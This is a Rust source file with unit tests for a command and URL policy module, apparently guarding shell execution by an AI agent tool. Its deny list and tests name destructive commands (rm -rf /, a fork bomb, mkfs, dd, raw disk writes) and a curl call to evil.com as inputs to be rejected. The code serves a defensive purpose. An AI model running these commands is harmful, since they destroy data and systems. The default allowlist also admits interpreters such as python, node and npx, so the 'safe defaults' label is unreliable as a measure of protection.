1use std::collections::HashSet;
14
15#[non_exhaustive]
19#[derive(Debug, Clone, Default, PartialEq, Eq)]
20pub enum PolicyMode {
21 #[default]
23 Allowlist,
24 Denylist,
26}
27
28#[non_exhaustive]
30#[derive(Debug, Clone, PartialEq, Eq)]
31pub enum CommandPolicyError {
32 NotAllowed { command: String },
34 Blocked { command: String, pattern: String },
36 DangerousPattern { command: String, pattern: String },
38}
39
40impl std::fmt::Display for CommandPolicyError {
41 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
42 match self {
43 Self::NotAllowed { command } => write!(f, "command not allowed: {command}"),
44 Self::Blocked { command, pattern } => {
45 write!(f, "command blocked: {command} (matched pattern: {pattern})")
46 }
47 Self::DangerousPattern { command, pattern } => {
48 write!(
49 f,
50 "dangerous command: {command} (matched pattern: {pattern})"
51 )
52 }
53 }
54 }
55}
56
57impl std::error::Error for CommandPolicyError {}
58
59#[derive(Debug, Clone)]
66pub struct CommandPolicy {
67 pub mode: PolicyMode,
69 pub allowlist: HashSet<String>,
71 pub denylist: Vec<String>,
73 pub dangerous_patterns: Vec<String>,
75}
76
77pub const DEFAULT_COMMAND_ALLOWLIST: &[&str] = &[
83 "echo", "cat", "ls", "pwd", "head", "tail", "wc", "grep", "find", "sort", "uniq", "diff",
85 "date", "env", "true", "false", "test", "which", "basename", "dirname", "stat", "file",
86 "readlink",
87 "sed", "awk", "cut", "tr", "tee", "xargs",
89 "mkdir", "cp", "mv", "touch", "rm", "ln", "chmod",
91 "cd", "export", "source", "type", "command",
93 "git", "cargo", "rustc", "npm", "npx", "node", "python", "python3",
95 "weft", "claude-flow",
97];
98
99pub const DEFAULT_DANGEROUS_PATTERNS: &[&str] = &[
101 "rm -rf /",
102 "sudo ",
103 "mkfs",
104 "dd if=",
105 ":(){ :|:& };:",
106 "chmod 777 /",
107 "> /dev/sd",
108 "shutdown",
109 "reboot",
110 "poweroff",
111 "format c:",
112];
113
114impl Default for CommandPolicy {
115 fn default() -> Self {
116 Self::safe_defaults()
117 }
118}
119
120impl CommandPolicy {
121 pub fn safe_defaults() -> Self {
128 let allowlist = DEFAULT_COMMAND_ALLOWLIST
129 .iter()
130 .map(|s| (*s).to_string())
131 .collect();
132 let dangerous_patterns: Vec<String> = DEFAULT_DANGEROUS_PATTERNS
133 .iter()
134 .map(|s| (*s).to_string())
135 .collect();
136 let denylist = dangerous_patterns.clone();
137
138 Self {
139 mode: PolicyMode::Allowlist,
140 allowlist,
141 denylist,
142 dangerous_patterns,
143 }
144 }
145
146 pub fn new(mode: PolicyMode, allowlist: HashSet<String>, denylist: Vec<String>) -> Self {
148 let dangerous_patterns: Vec<String> = DEFAULT_DANGEROUS_PATTERNS
149 .iter()
150 .map(|s| (*s).to_string())
151 .collect();
152
153 Self {
154 mode,
155 allowlist,
156 denylist,
157 dangerous_patterns,
158 }
159 }
160
161 pub fn validate(&self, command: &str) -> Result<(), CommandPolicyError> {
169 let normalized: String = command
172 .chars()
173 .map(|c| if c.is_whitespace() { ' ' } else { c })
174 .collect();
175 let lower = normalized.to_lowercase();
176
177 for pattern in &self.dangerous_patterns {
179 if lower.contains(&pattern.to_lowercase()) {
180 return Err(CommandPolicyError::DangerousPattern {
181 command: command.to_string(),
182 pattern: pattern.clone(),
183 });
184 }
185 }
186
187 match self.mode {
189 PolicyMode::Allowlist => {
190 for sub in split_shell_commands(command) {
194 let token = extract_first_token(sub);
195 if !self.allowlist.contains(token) {
196 return Err(CommandPolicyError::NotAllowed {
197 command: command.to_string(),
198 });
199 }
200 }
201 }
202 PolicyMode::Denylist => {
203 for pattern in &self.denylist {
204 if lower.contains(&pattern.to_lowercase()) {
205 return Err(CommandPolicyError::Blocked {
206 command: command.to_string(),
207 pattern: pattern.clone(),
208 });
209 }
210 }
211 }
212 }
213
214 Ok(())
215 }
216}
217
218pub fn split_shell_commands(command: &str) -> Vec<&str> {
228 let bytes = command.as_bytes();
229 let len = bytes.len();
230 let mut parts = Vec::new();
231 let mut start = 0;
232 let mut i = 0;
233
234 while i < len {
235 if i + 1 < len {
237 let pair = [bytes[i], bytes[i + 1]];
238 if pair == *b"&&" || pair == *b"||" {
239 let part = command[start..i].trim();
240 if !part.is_empty() {
241 parts.push(part);
242 }
243 i += 2;
244 start = i;
245 continue;
246 }
247 }
248 if bytes[i] == b';' || bytes[i] == b'|' {
250 let part = command[start..i].trim();
251 if !part.is_empty() {
252 parts.push(part);
253 }
254 i += 1;
255 start = i;
256 continue;
257 }
258 i += 1;
259 }
260
261 let part = command[start..].trim();
263 if !part.is_empty() {
264 parts.push(part);
265 }
266
267 parts
268}
269
270pub fn extract_first_token(command: &str) -> &str {
282 let trimmed = command.trim();
283 if trimmed.is_empty() {
284 return "";
285 }
286
287 let token = trimmed.split_whitespace().next().unwrap_or("");
288
289 match token.rfind('/') {
291 Some(pos) => &token[pos + 1..],
292 None => token,
293 }
294}
295
296#[derive(Debug, Clone)]
307pub struct UrlPolicy {
308 pub enabled: bool,
310 pub allow_private: bool,
312 pub allowed_domains: HashSet<String>,
314 pub blocked_domains: HashSet<String>,
316}
317
318impl Default for UrlPolicy {
319 fn default() -> Self {
320 Self {
321 enabled: true,
322 allow_private: false,
323 allowed_domains: HashSet::new(),
324 blocked_domains: HashSet::new(),
325 }
326 }
327}
328
329impl UrlPolicy {
330 pub fn new(
332 enabled: bool,
333 allow_private: bool,
334 allowed_domains: HashSet<String>,
335 blocked_domains: HashSet<String>,
336 ) -> Self {
337 Self {
338 enabled,
339 allow_private,
340 allowed_domains,
341 blocked_domains,
342 }
343 }
344
345 pub fn permissive() -> Self {
349 Self {
350 enabled: false,
351 ..Default::default()
352 }
353 }
354}
355
356#[cfg(test)]
359mod tests {
360 use super::*;
361
362 #[test]
365 fn command_policy_safe_defaults() {
366 let policy = CommandPolicy::safe_defaults();
367 assert_eq!(policy.mode, PolicyMode::Allowlist);
368 assert!(policy.allowlist.contains("echo"));
369 assert!(policy.allowlist.contains("ls"));
370 assert!(!policy.dangerous_patterns.is_empty());
371 }
372
373 #[test]
374 fn command_policy_new() {
375 let allowlist = HashSet::from(["curl".to_string()]);
376 let denylist = vec!["rm".to_string()];
377 let policy = CommandPolicy::new(PolicyMode::Denylist, allowlist, denylist);
378 assert_eq!(policy.mode, PolicyMode::Denylist);
379 assert!(policy.allowlist.contains("curl"));
380 assert_eq!(policy.denylist, vec!["rm".to_string()]);
381 }
382
383 #[test]
386 fn allowlist_permits_echo() {
387 let policy = CommandPolicy::safe_defaults();
388 assert!(policy.validate("echo hello").is_ok());
389 }
390
391 #[test]
392 fn allowlist_rejects_curl() {
393 let policy = CommandPolicy::safe_defaults();
394 let err = policy.validate("curl http://evil.com").unwrap_err();
395 assert!(matches!(err, CommandPolicyError::NotAllowed { .. }));
396 }
397
398 #[test]
399 fn dangerous_patterns_always_checked() {
400 let policy = CommandPolicy::safe_defaults();
401 let err = policy.validate("echo; rm -rf /").unwrap_err();
402 assert!(matches!(err, CommandPolicyError::DangerousPattern { .. }));
403 }
404
405 #[test]
406 fn denylist_mode_permits_unlisted() {
407 let mut policy = CommandPolicy::safe_defaults();
408 policy.mode = PolicyMode::Denylist;
409 assert!(policy.validate("curl http://safe.com").is_ok());
410 }
411
412 #[test]
413 fn tab_normalized_to_space() {
414 let policy = CommandPolicy::safe_defaults();
415 let result = policy.validate("sudo\tsomething");
416 assert!(result.is_err());
417 }
418
419 #[test]
422 fn extract_token_simple() {
423 assert_eq!(extract_first_token("echo foo"), "echo");
424 }
425
426 #[test]
427 fn extract_token_with_path() {
428 assert_eq!(extract_first_token("/usr/bin/ls -la"), "ls");
429 }
430
431 #[test]
432 fn extract_token_empty() {
433 assert_eq!(extract_first_token(""), "");
434 }
435
436 #[test]
439 fn url_policy_default() {
440 let policy = UrlPolicy::default();
441 assert!(policy.enabled);
442 assert!(!policy.allow_private);
443 assert!(policy.allowed_domains.is_empty());
444 assert!(policy.blocked_domains.is_empty());
445 }
446
447 #[test]
448 fn url_policy_permissive() {
449 let policy = UrlPolicy::permissive();
450 assert!(!policy.enabled);
451 }
452
453 #[test]
454 fn url_policy_new() {
455 let allowed = HashSet::from(["internal.corp".to_string()]);
456 let blocked = HashSet::from(["evil.com".to_string()]);
457 let policy = UrlPolicy::new(true, true, allowed, blocked);
458 assert!(policy.enabled);
459 assert!(policy.allow_private);
460 assert!(policy.allowed_domains.contains("internal.corp"));
461 assert!(policy.blocked_domains.contains("evil.com"));
462 }
463
464 #[test]
465 fn policy_mode_default_is_allowlist() {
466 assert_eq!(PolicyMode::default(), PolicyMode::Allowlist);
467 }
468
469 #[test]
470 fn command_policy_error_display() {
471 let err = CommandPolicyError::NotAllowed {
472 command: "curl".into(),
473 };
474 assert_eq!(err.to_string(), "command not allowed: curl");
475 }
476
477 #[test]
480 fn split_simple_command() {
481 assert_eq!(split_shell_commands("echo hello"), vec!["echo hello"]);
482 }
483
484 #[test]
485 fn split_and_operator() {
486 assert_eq!(
487 split_shell_commands("cd foo && claude-flow mcp status"),
488 vec!["cd foo", "claude-flow mcp status"]
489 );
490 }
491
492 #[test]
493 fn split_or_operator() {
494 assert_eq!(
495 split_shell_commands("ls /tmp || echo fallback"),
496 vec!["ls /tmp", "echo fallback"]
497 );
498 }
499
500 #[test]
501 fn split_semicolon() {
502 assert_eq!(
503 split_shell_commands("echo a; echo b"),
504 vec!["echo a", "echo b"]
505 );
506 }
507
508 #[test]
509 fn split_pipe() {
510 assert_eq!(
511 split_shell_commands("cat file | grep pattern"),
512 vec!["cat file", "grep pattern"]
513 );
514 }
515
516 #[test]
517 fn split_mixed_operators() {
518 assert_eq!(
519 split_shell_commands("cd dir && git status | grep modified; echo done"),
520 vec!["cd dir", "git status", "grep modified", "echo done"]
521 );
522 }
523
524 #[test]
525 fn split_empty() {
526 let result: Vec<&str> = split_shell_commands("");
527 assert!(result.is_empty());
528 }
529
530 #[test]
533 fn allowlist_permits_compound_when_all_allowed() {
534 let policy = CommandPolicy::safe_defaults();
535 assert!(policy.validate("cd clawft && claude-flow mcp status").is_ok());
537 }
538
539 #[test]
540 fn allowlist_rejects_compound_when_any_disallowed() {
541 let policy = CommandPolicy::safe_defaults();
542 let err = policy.validate("echo hi && curl http://evil.com").unwrap_err();
544 assert!(matches!(err, CommandPolicyError::NotAllowed { .. }));
545 }
546
547 #[test]
548 fn allowlist_permits_pipe_chain() {
549 let policy = CommandPolicy::safe_defaults();
550 assert!(policy.validate("cat file | grep pattern | sort").is_ok());
551 }
552
553 #[test]
554 fn allowlist_permits_dev_tools() {
555 let policy = CommandPolicy::safe_defaults();
556 assert!(policy.validate("git status").is_ok());
557 assert!(policy.validate("cargo build").is_ok());
558 assert!(policy.validate("npx @claude-flow/cli@latest").is_ok());
559 assert!(policy.validate("weft agent list").is_ok());
560 assert!(policy.validate("npm install").is_ok());
561 }
562
563 #[test]
564 fn dangerous_pattern_still_blocks_compound() {
565 let policy = CommandPolicy::safe_defaults();
566 let err = policy.validate("echo hi && rm -rf /").unwrap_err();
568 assert!(matches!(err, CommandPolicyError::DangerousPattern { .. }));
569 }
570}